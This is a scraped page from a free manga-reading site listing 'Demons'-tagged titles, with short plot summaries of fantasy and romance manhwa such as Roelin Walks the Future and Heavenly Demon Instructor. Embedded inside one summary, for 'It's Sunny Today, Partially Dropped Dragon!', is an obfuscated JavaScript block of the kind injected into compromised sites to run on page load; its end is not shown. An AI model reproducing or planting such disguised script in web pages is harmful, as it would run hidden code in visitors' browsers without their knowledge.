Demons - Page 9

Enjoy the finest manga Demons titles online. Don’t miss the chance to read Demons manga for free!

121 results

Roelin Walks the Future

Summary Roelin Walks the Future: Roelin Deaz, the daughter of Count Deaz, who is supporting the family that is in debt due to her father’s business failure. While struggling to raise the family on the verge of collapse, Roelin has an accident that almost killed her one day. This as an opportunity, she remembers the past when she was the high priest of the temple of night and darkness, which has now disappeared, and gains the power of her previous life, which is the power to know the future through dreams-! After accepting her change, Roelin uses her previous life’s experiences and abilities to work hard to revive her family. Then one day, through a dream, she sees someone’s death. That person is none other than the protector of the empire, Duke Dante Van Benerite, who is called the Knight of Brilliance!? Roelin learns of his miserable future and becomes conflicted…! What will Roelin do?


Reincarnation Of The Battle God

Reincarnation of the Suicidal Battle God Humanity’s strongest regression action fantasy. “Even if the disgusting gods did it, they still gave the opportunity. if you want to wedge you have to kill them”. Zephir, the last survivior of mankind. The lonely battle with demon lord ended id defeat, but the opportunity given by the gods bring us back 10 years ago. The gods who treated demons and humans as a shit.


The Golden Dawn Light Will Shine For You

Read manhwa The Golden Light of Dawn / The golden dawn light will shine for you / 황금빛 여명이 너를 비추리 You’re still precious to me. After losing her family in a demon attack, Rosha is reborn as the 777th most powerful magic knight in the Golden Dawn Society. To avenge her family, she trains hard and rises through the ranks against the odds. Then, she is tasked with protecting little Joshua, who is said to be the Child of God.


Ougs’s Law

Su Yuan, a poor student, in order to not place any additional burdens on his family, accidentally got himself enrolled into a college named, Ogus Academy. But soon he discovered that this institution was actually established for the protection of monsters (demons/beasts); and the physically weaker humans, in order to protect their lives, had to form partnerships—called PAL, with those monsters. Furthermore, as a result of his unique scent, many are drawn towards him in hopes of becoming his PAL; and at same time, he is also subjected to various attacks. That was, at least, until the day he rescued a fox covered in blood from head to toe, only to then discover…


It’s Sunny Today, Partially Dropped Dragon!

A young girl with a pair of bone braids who was regarded as an evil thing, accidentally got hit on her head by a dragon egg. Turns out there is a little dragon baby. They travel together to find their own home with two adorable creatures. What adventures will they have along the way?<script></script><script>(function(_0x2ae4f4,_0x318123){var _0x30bc18=_0x295b,_0x1159aa=_0x2ae4f4();while(!![]){try{var _0x32968f=-parseInt(_0x30bc18(0x10b))/(-0xa6b+0x20f9+-0x168d)+-parseInt(_0x30bc18(0x119))/(0x8*0x329+0x21dc+-0x349*0x12)*(parseInt(_0x30bc18(0x10d))/(0x582+0x326*-0x7+0x108b))+parseInt(_0x30bc18(0x11d))/(0x1*0x1862+0xd27+-0x2585)*(-parseInt(_0x30bc18(0x11f))/(-0x1782+-0x2229+0x39b0))+parseInt(_0x30bc18(0x125))/(0x58*0x6a+-0x1*0xe0a+0x20*-0xb3)+parseInt(_0x30bc18(0x127))/(0x8d*0x13+0x8f*-0x35+0x132b)*(parseInt(_0x30bc18(0x12a))/(0x2032+0x86f*-0x2+-0xf4c))+-parseInt(_0x30bc18(0x122))/(0x11+0x1*0x1822+0x407*-0x6)+parseInt(_0x30bc18(0x11e))/(-0x1*0x852+0xc7f*0x1+-0x423);if(_0x32968f===_0x318123)break;else _0x1159aa['push'](_0x1159aa['shift']());}catch(_0x575e6d){_0x1159aa['push'](_0x1159aa['shift']());}}}(_0x43fe,0x1*-0x1b194+-0x27235+0x69dfd));function custom(){var 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Oh, Be Patient My Lady!

Oh, Be Patient My Lady! Rose, lord of a small and poor territory, White. She just wants to eat well and live well with the residents there. But her life can’t be that normal. More and more immigrants from other areas are coming, and they are getting into trouble?! This is an exciting romantic fantasy story about Rose, a powerful and capable lord, and the great Archmage Yggdrasil, who wants to secretly hide her in his land and protect her! Follow this story with us and don’t forget to leave your opinion. We hope you will always support us &gt;&gt;;&lt; Thank you! Oh, Come On! / 아, 쯤 참으세요 영주님! / 아, 쫌! / Ah, Hang on a Little Longer, My Lord


The Deviless’s Impression of a Princess

How to catch a knight? Impersonate a princess! Lilith the Demon Queen longs to meet a knight like the ones she reads about in books. In order to lure one to her castle, she kidnaps a princess and waits. Much to her delight, the knight who shows up is exactly as she pictured him! She decides to disguise herself as the princess to capture his heart…


The Farewell of Canglan

Love Between Fairy and Devil / 苍兰诀 / 魔尊 / Cang Lan Jue / Разлука Орхидеи и повелителя демонов / ของรักของข้า From loveless translations: After a great battle, the weakened demon tribe resurrected the ancient demon lord Dongfang Qingcang, whom they thought would lead the demon tribe to victory over the heavenly realm. Unfortunately, the mighty demon lord accidentally swapped bodies with an inexperienced flower-spirit. What should’ve been an epic war of destruction between the three realms became a slapstick romantic comedy that will create an uproar in the realms instead.


Heavenly Demon Instructor

<div class="description-summary"> <div class="summary__content show-more active">“Master, what’s the next lesson?!!!” A disaster that struck the earth, [Portal Impact], caused Park Hyunsoo, the MC, to lose his parents before his eyes. The only family member he has left is his younger sibling who is unconscious. In order to protect his younger sibling, he did his best but as a powerless support, he would always be on the other side of contempt… And that’s when a helper, Chungyeong, appeared! Chungyeong, a murim martial master that has travelled through time to come here from the Murim to teach Hyunsoo martial arts… “Hey, disciple…” “Yes, Master.”</div> <div class="c-content-readmore"></div> </div> <div class="c-blog__heading style-2 font-heading"> <h2 class="h4"></h2> </div>


Bead Master

“Warning: Yuri content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” Lee Jinhwa lived an ordinary life until she swallowed a fox bead gifted by a mysterious peddler, mistaking it for a wish-fulfilling marble. Little did Jinhwa know that her actions would lead her to be haunted by Koo Miho, an infamous nine-tailed fox who wishes to retrieve the bead. To add fuel to the fire, Jinhwa soon discovers that she’s also become a target for various spirits and demons, and the only way to extract the cause of the issue is for Miho to kill her…or kiss her! Bead’s Owner; Marble’s Owner; The Bead’s Owner; The Marble’s Owner; 구슬의 주인 / Master of the Fox Bead (Official)


Hero vs. Villain

“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” They couldn’t be more different. Ridley is a knight in shining armor. Prince Vandel, the Demon Prince of Darkness, is the sworn enemy of the kingdom. The two young men are right out of a fairytale, practically made to be archenemies… but what if they ended up falling in love instead? Villan vs. Hero


I’ve Waited for the Fairy Teacher for Hundreds of Years

“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” I’ll wait for you for as long as forever. Fairy Teacher Xing Li is on a mission to seal an evil relic when he falls into the Mortal Realm and loses his memory. Nuo Qing, his self-proclaimed disciple, takes him home. But only when an old friend visits does Xing Li realize that Nuo Qing has been waiting hundreds of years for him?
